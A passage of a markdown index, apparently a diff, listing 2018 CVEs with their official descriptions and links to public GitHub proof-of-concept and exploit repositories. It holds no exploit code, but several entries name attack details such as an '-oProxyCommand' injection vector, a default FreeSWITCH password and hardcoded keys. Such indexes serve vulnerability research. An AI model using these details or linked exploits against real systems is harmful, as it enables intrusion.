hooks with arbitrary code, which will automatically be run as root, or remove packages vital to the system. + + +- [coderobe/CVE-2018-15912-PoC](https://github.com/coderobe/CVE-2018-15912-PoC) + +### CVE-2018-15961 (2018-09-25) + +Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + + +- [vah13/CVE-2018-15961](https://github.com/vah13/CVE-2018-15961) +- [cved-sources/cve-2018-15961](https://github.com/cved-sources/cve-2018-15961) +- [xbufu/CVE-2018-15961](https://github.com/xbufu/CVE-2018-15961) +- [orangmuda/CVE-2018-15961](https://github.com/orangmuda/CVE-2018-15961) +- [bu1xuan2/CVE-2018-15961](https://github.com/bu1xuan2/CVE-2018-15961) + +### CVE-2018-15968 (2018-10-12) + +Adobe Acrobat and Reader versions 2018.011.20063 and earlier, 2017.011.30102 and earlier, and 2015.006.30452 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure. + + +- [sharmasandeepkr/cve-2018-15968](https://github.com/sharmasandeepkr/cve-2018-15968) + +### CVE-2018-15982 (2019-01-18) + +Flash Player versions 31.0.0.153 and earlier, and 31.0.0.108 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution. + + +- [FlatL1neAPT/CVE-2018-15982](https://github.com/FlatL1neAPT/CVE-2018-15982) +- [Ormicron/CVE-2018-15982_PoC](https://github.com/Ormicron/CVE-2018-15982_PoC) +- [Ridter/CVE-2018-15982_EXP](https://github.com/Ridter/CVE-2018-15982_EXP) +- [kphongagsorn/adobe-flash-cve2018-15982](https://github.com/kphongagsorn/adobe-flash-cve2018-15982) +- [jas502n/CVE-2018-15982_EXP_IE](https://github.com/jas502n/CVE-2018-15982_EXP_IE) +- [scanfsec/CVE-2018-15982](https://github.com/scanfsec/CVE-2018-15982) +- [SyFi/CVE-2018-15982](https://github.com/SyFi/CVE-2018-15982) +- [create12138/CVE-2018-15982](https://github.com/create12138/CVE-2018-15982) + +### CVE-2018-16119 (2019-06-20) + +Stack-based buffer overflow in the httpd server of TP-Link WR1043nd (Firmware Version 3) allows remote attackers to execute arbitrary code via a malicious MediaServer request to /userRpm/MediaServerFoldersCfgRpm.htm. + + +- [hdbreaker/CVE-2018-16119](https://github.com/hdbreaker/CVE-2018-16119) + +### CVE-2018-16156 (2019-05-17) + +In PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7), the FJTWSVIC service running with SYSTEM privilege processes unauthenticated messages received over the FjtwMkic_Fjicube_32 named pipe. One of these message processing functions attempts to dynamically load the UninOldIS.dll library and executes an exported function named ChangeUninstallString. The default install does not contain this library and therefore if any DLL with that name exists in any directory listed in the PATH variable, it can be used to escalate to SYSTEM level privilege. + + +- [securifera/CVE-2018-16156-Exploit](https://github.com/securifera/CVE-2018-16156-Exploit) + +### CVE-2018-16167 (2019-01-09) + +LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + + +- [dnr6419/CVE-2018-16167](https://github.com/dnr6419/CVE-2018-16167) + +### CVE-2018-16283 (2018-09-24) + +The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter. + + +- [cved-sources/cve-2018-16283](https://github.com/cved-sources/cve-2018-16283) + +### CVE-2018-16323 (2018-09-01) + +ReadXBMImage in coders/xbm.c in ImageMagick before 7.0.8-9 leaves data uninitialized when processing an XBM file that has a negative pixel value. If the affected code is used as a library loaded into a process that includes sensitive information, that information sometimes can be leaked via the image data. + + +- [ttffdd/XBadManners](https://github.com/ttffdd/XBadManners) + +### CVE-2018-16341 +- [mpgn/CVE-2018-16341](https://github.com/mpgn/CVE-2018-16341) +- [CN016/Nuxeo-CVE-2018-16341](https://github.com/CN016/Nuxeo-CVE-2018-16341) + +### CVE-2018-16370 (2018-09-03) + +In PESCMS Team 2.2.1, attackers may upload and execute arbitrary PHP code through /Public/?g=Team&m=Setting&a=upgrade by placing a .php file in a ZIP archive. + + +- [snappyJack/CVE-2018-16370](https://github.com/snappyJack/CVE-2018-16370) + +### CVE-2018-16373 (2018-09-03) + +Frog CMS 0.9.5 has an Upload vulnerability that can create files via /admin/?/plugin/file_manager/save. + + +- [snappyJack/CVE-2018-16373](https://github.com/snappyJack/CVE-2018-16373) + +### CVE-2018-16431 (2018-09-04) + +admin/admin/adminsave.html in YFCMF v3.0 allows CSRF to add an administrator account. + + +- [RHYru9/CVE-2018-16431](https://github.com/RHYru9/CVE-2018-16431) + +### CVE-2018-16492 (2019-02-01) + +A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype. + + +- [dsp-testing/CVE-2018-16492](https://github.com/dsp-testing/CVE-2018-16492) + +### CVE-2018-16509 (2018-09-05) + +An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction. + + +- [farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) +- [knqyf263/CVE-2018-16509](https://github.com/knqyf263/CVE-2018-16509) +- [cved-sources/cve-2018-16509](https://github.com/cved-sources/cve-2018-16509) +- [rhpco/CVE-2018-16509](https://github.com/rhpco/CVE-2018-16509) + +### CVE-2018-16706 (2018-09-14) + +LG SuperSign CMS allows TVs to be rebooted remotely without authentication via a direct HTTP request to /qsr_server/device/reboot on port 9080. + + +- [Nurdilin/CVE-2018-16706](https://github.com/Nurdilin/CVE-2018-16706) + +### CVE-2018-16711 (2018-09-26) + +IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402088) with a buffer containing user defined content. The driver's subroutine will execute a wrmsr instruction with the user's buffer for input. + + +- [DownWithUp/CVE-2018-16711](https://github.com/DownWithUp/CVE-2018-16711) + +### CVE-2018-16712 (2018-09-26) + +IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send a specially crafted IOCTL 0x9C406104 to read physical memory. + + +- [DownWithUp/CVE-2018-16712](https://github.com/DownWithUp/CVE-2018-16712) + +### CVE-2018-16713 (2018-09-26) + +IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402084) with a buffer containing user defined content. The driver's subroutine will execute a rdmsr instruction with the user's buffer for input, and provide output from the instruction. + + +- [DownWithUp/CVE-2018-16713](https://github.com/DownWithUp/CVE-2018-16713) + +### CVE-2018-16763 (2018-09-09) + +FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution. + + +- [dinhbaouit/CVE-2018-16763](https://github.com/dinhbaouit/CVE-2018-16763) +- [hikarihacks/CVE-2018-16763-exploit](https://github.com/hikarihacks/CVE-2018-16763-exploit) +- [n3m1sys/CVE-2018-16763-Exploit-Python3](https://github.com/n3m1sys/CVE-2018-16763-Exploit-Python3) +- [uwueviee/Fu3l-F1lt3r](https://github.com/uwueviee/Fu3l-F1lt3r) +- [shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--](https://github.com/shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--) +- [kxisxr/Bash-Script-CVE-2018-16763](https://github.com/kxisxr/Bash-Script-CVE-2018-16763) +- [padsalatushal/CVE-2018-16763](https://github.com/padsalatushal/CVE-2018-16763) +- [wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763](https://github.com/wizardy0ga/THM-Vulnerability_Capstone-CVE-2018-16763) +- [n3rdh4x0r/CVE-2018-16763](https://github.com/n3rdh4x0r/CVE-2018-16763) +- [BrunoPincho/cve-2018-16763-rust](https://github.com/BrunoPincho/cve-2018-16763-rust) +- [p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE) +- [not1cyyy/CVE-2018-16763](https://github.com/not1cyyy/CVE-2018-16763) +- [antisecc/CVE-2018-16763](https://github.com/antisecc/CVE-2018-16763) +- [VitoBonetti/CVE-2018-16763](https://github.com/VitoBonetti/CVE-2018-16763) + +### CVE-2018-16809 (2019-03-07) + +An issue was discovered in Dolibarr through 7.0.0. expensereport/card.php in the expense reports module allows SQL injection via the integer parameters qty and value_unit. + + +- [elkassimyhajar/CVE-2018-16809](https://github.com/elkassimyhajar/CVE-2018-16809) + +### CVE-2018-16843 (2018-11-07) + +nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file. + + +- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5) + +### CVE-2018-16854 (2018-11-26) + +A flaw was found in moodle versions 3.5 to 3.5.2, 3.4 to 3.4.5, 3.3 to 3.3.8, 3.1 to 3.1.14 and earlier. The login form is not protected by a token to prevent login cross-site request forgery. Fixed versions include 3.6, 3.5.3, 3.4.6, 3.3.9 and 3.1.15. + + +- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf) + +### CVE-2018-16858 (2019-03-25) + +It was found that libreoffice before versions 6.0.7 and 6.1.3 was vulnerable to a directory traversal attack which could be used to execute arbitrary macros bundled with a document. An attacker could craft a document, which when opened by LibreOffice, would execute a Python method from a script in any arbitrary file system location, specified relative to the LibreOffice install location. + + +- [4nimanegra/libreofficeExploit1](https://github.com/4nimanegra/libreofficeExploit1) +- [phongld97/detect-cve-2018-16858](https://github.com/phongld97/detect-cve-2018-16858) +- [bantu2301/CVE-2018-16858](https://github.com/bantu2301/CVE-2018-16858) +- [Henryisnotavailable/CVE-2018-16858-Python](https://github.com/Henryisnotavailable/CVE-2018-16858-Python) + +### CVE-2018-16875 (2018-12-14) + +The crypto/x509 package of Go before 1.10.6 and 1.11.x before 1.11.3 does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected. + + +- [alexzorin/poc-cve-2018-16875](https://github.com/alexzorin/poc-cve-2018-16875) + +### CVE-2018-16890 (2019-02-06) + +libcurl versions from 7.36.0 to before 7.64.0 is vulnerable to a heap buffer out-of-bounds read. The function handling incoming NTLM type-2 messages (`lib/vauth/ntlm.c:ntlm_decode_type2_target`) does not validate incoming data correctly and is subject to an integer overflow vulnerability. Using that overflow, a malicious or broken NTLM server could trick libcurl to accept a bad length + offset combination that would lead to a buffer read out-of-bounds. + + +- [michelleamesquita/CVE-2018-16890](https://github.com/michelleamesquita/CVE-2018-16890) + +### CVE-2018-16987 (2018-09-13) + +Squash TM through 1.18.0 presents the cleartext passwords of external services in the administration panel, as demonstrated by a ta-server-password field in the HTML source code. + + +- [gquere/CVE-2018-16987](https://github.com/gquere/CVE-2018-16987) + +### CVE-2018-17081 (2018-09-26) + +e107 2.1.9 allows CSRF via e107_admin/wmessage.php?mode=&action=inline&ajax_used=1&id= for changing the title of an arbitrary page. + + +- [himanshurahi/e107_2.1.9_CSRF_POC](https://github.com/himanshurahi/e107_2.1.9_CSRF_POC) + +### CVE-2018-17144 (2018-09-19) + +Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash. + + +- [iioch/ban-exploitable-bitcoin-nodes](https://github.com/iioch/ban-exploitable-bitcoin-nodes) +- [hikame/CVE-2018-17144_POC](https://github.com/hikame/CVE-2018-17144_POC) + +### CVE-2018-17182 (2018-09-19) + +An issue was discovered in the Linux kernel through 4.18.8. The vmacache_flush_all function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations. + + +- [jas502n/CVE-2018-17182](https://github.com/jas502n/CVE-2018-17182) +- [likekabin/CVE-2018-17182](https://github.com/likekabin/CVE-2018-17182) +- [likekabin/vmacache_CVE-2018-17182](https://github.com/likekabin/vmacache_CVE-2018-17182) +- [jedai47/cve-2018-17182](https://github.com/jedai47/cve-2018-17182) + +### CVE-2018-17207 (2018-09-19) + +An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution. + + +- [cved-sources/cve-2018-17207](https://github.com/cved-sources/cve-2018-17207) + +### CVE-2018-17240 (2022-06-10) + +There is a memory dump vulnerability on Netwave IP camera devices at //proc/kcore that allows an unauthenticated attacker to exfiltrate sensitive information from the network configuration (e.g., username and password). + + +- [BBge/CVE-2018-17240](https://github.com/BBge/CVE-2018-17240) +- [Xewdy444/Netgrave](https://github.com/Xewdy444/Netgrave) + +### CVE-2018-17246 (2018-12-20) + +Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + + +- [mpgn/CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246) + +### CVE-2018-17254 (2018-09-20) + +The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. + + +- [Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection](https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection) +- [MataKucing-OFC/CVE-2018-17254](https://github.com/MataKucing-OFC/CVE-2018-17254) + +### CVE-2018-17418 (2019-03-07) + +Monstra CMS 3.0.4 allows remote attackers to execute arbitrary PHP code via a mixed-case file extension, as demonstrated by the 123.PhP filename, because plugins\box\filesmanager\filesmanager.admin.php mishandles the forbidden_types variable. + + +- [Jx0n0/monstra_cms-3.0.4--getshell](https://github.com/Jx0n0/monstra_cms-3.0.4--getshell) + +### CVE-2018-17431 (2019-01-29) + +Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL. + + +- [Fadavvi/CVE-2018-17431-PoC](https://github.com/Fadavvi/CVE-2018-17431-PoC) +- [sanan2004/CVE-2018-17431-Comodo](https://github.com/sanan2004/CVE-2018-17431-Comodo) + +### CVE-2018-17456 (2018-10-06) + +Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character. + + +- [shpik-kr/CVE-2018-17456](https://github.com/shpik-kr/CVE-2018-17456) +- [matlink/CVE-2018-17456](https://github.com/matlink/CVE-2018-17456) +- [799600966/CVE-2018-17456](https://github.com/799600966/CVE-2018-17456) +- [AnonymKing/CVE-2018-17456](https://github.com/AnonymKing/CVE-2018-17456) +- [jiahuiLeee/test](https://github.com/jiahuiLeee/test) +- [KKkai0315/CVE-2018-17456](https://github.com/KKkai0315/CVE-2018-17456) + +### CVE-2018-17463 (2018-11-14) + +Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. + + +- [kdmarti2/CVE-2018-17463](https://github.com/kdmarti2/CVE-2018-17463) +- [jhalon/CVE-2018-17463](https://github.com/jhalon/CVE-2018-17463) + +### CVE-2018-17552 (2018-10-03) + +SQL Injection in login.php in Naviwebs Navigate CMS 2.8 allows remote attackers to bypass authentication via the navigate-user cookie. + + +- [kimstars/CVE-2018-17552](https://github.com/kimstars/CVE-2018-17552) + +### CVE-2018-17553 (2018-10-03) + +An "Unrestricted Upload of File with Dangerous Type" issue with directory traversal in navigate_upload.php in Naviwebs Navigate CMS 2.8 allows authenticated attackers to achieve remote code execution via a POST request with engine=picnik and id=../../../navigate_info.php. + + +- [MidwintersTomb/CVE-2018-17553](https://github.com/MidwintersTomb/CVE-2018-17553) + +### CVE-2018-17873 (2018-10-23) + +An incorrect access control vulnerability in the FTP configuration of WiFiRanger devices with firmware version 7.0.8rc3 and earlier allows an attacker with adjacent network access to read the SSH Private Key and log in to the root account. + + +- [Luct0r/CVE-2018-17873](https://github.com/Luct0r/CVE-2018-17873) + +### CVE-2018-17924 (2018-12-07) + +Rockwell Automation MicroLogix 1400 Controllers and 1756 ControlLogix Communications Modules An unauthenticated, remote threat actor could send a CIP connection request to an affected device, and upon successful connection, send a new IP configuration to the affected device even if the controller in the system is set to Hard RUN mode. When the affected device accepts this new IP configuration, a loss of communication occurs between the device and the rest of the system as the system traffic is still attempting to communicate with the device via the overwritten IP address. + + +- [g0dd0ghd/CVE-2018-17924-PoC](https://github.com/g0dd0ghd/CVE-2018-17924-PoC) + +### CVE-2018-17961 (2018-10-15) + +Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183. + + +- [matlink/CVE-2018-17961](https://github.com/matlink/CVE-2018-17961) + +### CVE-2018-18026 (2018-10-19) + +IMFCameraProtect.sys in IObit Malware Fighter 6.2 (and possibly lower versions) is vulnerable to a stack-based buffer overflow. The attacker can use DeviceIoControl to pass a user specified size which can be used to overwrite return addresses. This can lead to a denial of service or code execution attack. + + +- [DownWithUp/CVE-2018-18026](https://github.com/DownWithUp/CVE-2018-18026) + +### CVE-2018-18333 (2019-02-05) + +A DLL hijacking vulnerability in Trend Micro Security 2019 (Consumer) versions below 15.0.0.1163 and below could allow an attacker to manipulate a specific DLL and escalate privileges on vulnerable installations. + + +- [mrx04programmer/Dr.DLL-CVE-2018-18333](https://github.com/mrx04programmer/Dr.DLL-CVE-2018-18333) + +### CVE-2018-18368 (2019-11-15) + +Symantec Endpoint Protection Manager (SEPM), prior to 14.2 RU1, may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user. + + +- [DimopoulosElias/SEPM-EoP](https://github.com/DimopoulosElias/SEPM-EoP) + +### CVE-2018-18387 (2018-10-29) + +playSMS through 1.4.2 allows Privilege Escalation through Daemon abuse. + + +- [TheeBlind/CVE-2018-18387](https://github.com/TheeBlind/CVE-2018-18387) + +### CVE-2018-18500 (2019-02-05) + +A use-after-free vulnerability can occur while parsing an HTML5 stream in concert with custom HTML elements. This results in the stream parser object being freed while still in use, leading to a potentially exploitable crash. This vulnerability affects Thunderbird < 60.5, Firefox ESR < 60.5, and Firefox < 65. + + +- [sophoslabs/CVE-2018-18500](https://github.com/sophoslabs/CVE-2018-18500) + +### CVE-2018-18649 (2018-11-29) + +An issue was discovered in the wiki API in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows for remote code execution. + + +- [Snowming04/CVE-2018-18649](https://github.com/Snowming04/CVE-2018-18649) + +### CVE-2018-18714 (2018-11-01) + +RegFilter.sys in IOBit Malware Fighter 6.2 and earlier is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E010. This can lead to denial of service (DoS) or code execution with root privileges. + + +- [DownWithUp/CVE-2018-18714](https://github.com/DownWithUp/CVE-2018-18714) + +### CVE-2018-18778 (2018-10-29) + +ACME mini_httpd before 1.30 lets remote users read arbitrary files. + + +- [cyberharsh/Mini_httpd-CVE-2018-18778](https://github.com/cyberharsh/Mini_httpd-CVE-2018-18778) +- [auk0x01/CVE-2018-18778-Scanner](https://github.com/auk0x01/CVE-2018-18778-Scanner) + +### CVE-2018-18852 (2019-06-18) + +Cerio DT-300N 1.1.6 through 1.1.12 devices allow OS command injection because of improper input validation of the web-interface PING feature's use of Save.cgi to execute a ping command, as exploited in the wild in October 2018. + + +- [hook-s3c/CVE-2018-18852](https://github.com/hook-s3c/CVE-2018-18852) +- [andripwn/CVE-2018-18852](https://github.com/andripwn/CVE-2018-18852) + +### CVE-2018-18893 (2019-01-03) + +Jinjava before 2.4.6 does not block the getClass method, related to com/hubspot/jinjava/el/ext/JinjavaBeanELResolver.java. + + +- [LycsHub/CVE-2018-18893](https://github.com/LycsHub/CVE-2018-18893) + +### CVE-2018-18925 (2018-11-04) + +Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + + +- [j4k0m/CVE-2018-18925](https://github.com/j4k0m/CVE-2018-18925) + +### CVE-2018-18955 (2018-11-16) + +In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction. + + +- [scheatkode/CVE-2018-18955](https://github.com/scheatkode/CVE-2018-18955) + +### CVE-2018-19052 (2018-11-07) + +An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character. + + +- [iveresk/cve-2018-19052](https://github.com/iveresk/cve-2018-19052) + +### CVE-2018-19126 (2018-11-09) + +PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload. + + +- [farisv/PrestaShop-CVE-2018-19126](https://github.com/farisv/PrestaShop-CVE-2018-19126) + +### CVE-2018-19127 (2018-11-09) + +A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring. + + +- [ab1gale/phpcms-2008-CVE-2018-19127](https://github.com/ab1gale/phpcms-2008-CVE-2018-19127) + +### CVE-2018-19131 (2018-11-09) + +Squid before 4.4 has XSS via a crafted X.509 certificate during HTTP(S) error page generation for certificate errors. + + +- [JonathanWilbur/CVE-2018-19131](https://github.com/JonathanWilbur/CVE-2018-19131) + +### CVE-2018-19207 (2018-11-12) + +The Van Ons WP GDPR Compliance (aka wp-gdpr-compliance) plugin before 1.4.3 for WordPress allows remote attackers to execute arbitrary code because $wpdb->prepare() input is mishandled, as exploited in the wild in November 2018. + + +- [aeroot/WP-GDPR-Compliance-Plugin-Exploit](https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit) +- [cved-sources/cve-2018-19207](https://github.com/cved-sources/cve-2018-19207) + +### CVE-2018-19246 (2018-11-13) + +PHP-Proxy 5.1.0 allows remote attackers to read local files if the default "pre-installed version" (intended for users who lack shell access to their web server) is used. This occurs because the aeb067ca0aa9a3193dce3a7264c90187 app_key value from the default config.php is in place, and this value can be easily used to calculate the authorization data needed for local file inclusion. + + +- [NeoWans/CVE-2018-19246](https://github.com/NeoWans/CVE-2018-19246) + +### CVE-2018-19276 (2019-03-17) + +OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body. + + +- [mpgn/CVE-2018-19276](https://github.com/mpgn/CVE-2018-19276) + +### CVE-2018-19320 (2018-12-21) + +The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system. + + +- [ASkyeye/CVE-2018-19320](https://github.com/ASkyeye/CVE-2018-19320) +- [hmnthabit/CVE-2018-19320-LPE](https://github.com/hmnthabit/CVE-2018-19320-LPE) +- [zer0condition/GDRVLoader](https://github.com/zer0condition/GDRVLoader) + +### CVE-2018-19321 (2018-12-21) + +The GPCIDrv and GDrv low-level drivers in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges. + + +- [nanabingies/Driver-RW](https://github.com/nanabingies/Driver-RW) +- [nanabingies/CVE-2018-19321](https://github.com/nanabingies/CVE-2018-19321) + +### CVE-2018-19410 (2018-11-21) + +PRTG Network Monitor before 18.2.40.1683 allows remote unauthenticated attackers to create users with read-write privileges (including administrator). A remote unauthenticated user can craft an HTTP request and override attributes of the 'include' directive in /public/login.htm and perform a Local File Inclusion attack, by including /api/addusers and executing it. By providing the 'id' and 'users' parameters, an unauthenticated attacker can create a user with read-write privileges (including administrator). + + +- [himash/CVE-2018-19410-POC](https://github.com/himash/CVE-2018-19410-POC) + +### CVE-2018-19422 (2018-11-21) + +/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these. + + +- [hev0x/CVE-2018-19422-SubrionCMS-RCE](https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE) +- [Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-](https://github.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-) + +### CVE-2018-19466 (2019-03-27) + +A vulnerability was found in Portainer before 1.20.0. Portainer stores LDAP credentials, corresponding to a master password, in cleartext and allows their retrieval via API calls. + + +- [MauroEldritch/lempo](https://github.com/MauroEldritch/lempo) + +### CVE-2018-19487 (2019-03-17) + +The WP-jobhunt plugin before version 2.4 for WordPress does not control AJAX requests sent to the cs_employer_ajax_profile() function through the admin-ajax.php file, which allows remote unauthenticated attackers to enumerate information about users. + + +- [YOLOP0wn/wp-jobhunt-exploit](https://github.com/YOLOP0wn/wp-jobhunt-exploit) + +### CVE-2018-19518 (2018-11-25) + +University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. + + +- [ensimag-security/CVE-2018-19518](https://github.com/ensimag-security/CVE-2018-19518) +- [houqe/EXP_CVE-2018-19518](https://github.com/houqe/EXP_CVE-2018-19518) + +### CVE-2018-19537 (2018-11-26) + +TP-Link Archer C5 devices through V2_160201_US allow remote command execution via shell metacharacters on the wan_dyn_hostname line of a configuration file that is encrypted with the 478DA50BF9E3D2CF key and uploaded through the web GUI by using the web admin account. The default password of admin may be used in some cases. + + +- [JackDoan/TP-Link-ArcherC5-RCE](https://github.com/JackDoan/TP-Link-ArcherC5-RCE) + +### CVE-2018-19571 (2019-07-10) + +GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks. + + +- [xenophil90/edb-49263-fixed](https://github.com/xenophil90/edb-49263-fixed) +- [Algafix/gitlab-RCE-11.4.7](https://github.com/Algafix/gitlab-RCE-11.4.7) +- [CS4239-U6/gitlab-ssrf](https://github.com/CS4239-U6/gitlab-ssrf) + +### CVE-2018-19592 (2019-09-27) + +The "CLink4Service" service is installed with Corsair Link 4.9.7.35 with insecure permissions by default. This allows unprivileged users to take control of the service and execute commands in the context of NT AUTHORITY\SYSTEM, leading to total system takeover, a similar issue to CVE-2018-12441. + + +- [BradyDonovan/CVE-2018-19592](https://github.com/BradyDonovan/CVE-2018-19592) + +### CVE-2018-19788 (2018-12-03) + +A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command. + + +- [AbsoZed/CVE-2018-19788](https://github.com/AbsoZed/CVE-2018-19788) +- [d4gh0s7/CVE-2018-19788](https://github.com/d4gh0s7/CVE-2018-19788) +- [Ekultek/PoC](https://github.com/Ekultek/PoC) +- [jhlongjr/CVE-2018-19788](https://github.com/jhlongjr/CVE-2018-19788) + +### CVE-2018-19859 (2018-12-05) + +OpenRefine before 3.2 beta allows directory traversal via a relative pathname in a ZIP archive. + + +- [WhiteOakSecurity/CVE-2018-19859](https://github.com/WhiteOakSecurity/CVE-2018-19859) + +### CVE-2018-19911 (2018-12-06) + +FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of works for the freeswitch account can sometimes be used. + + +- [iSafeBlue/freeswitch_rce](https://github.com/iSafeBlue/freeswitch_rce) + +### CVE-2018-19987 (2019-05-13) + +D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell 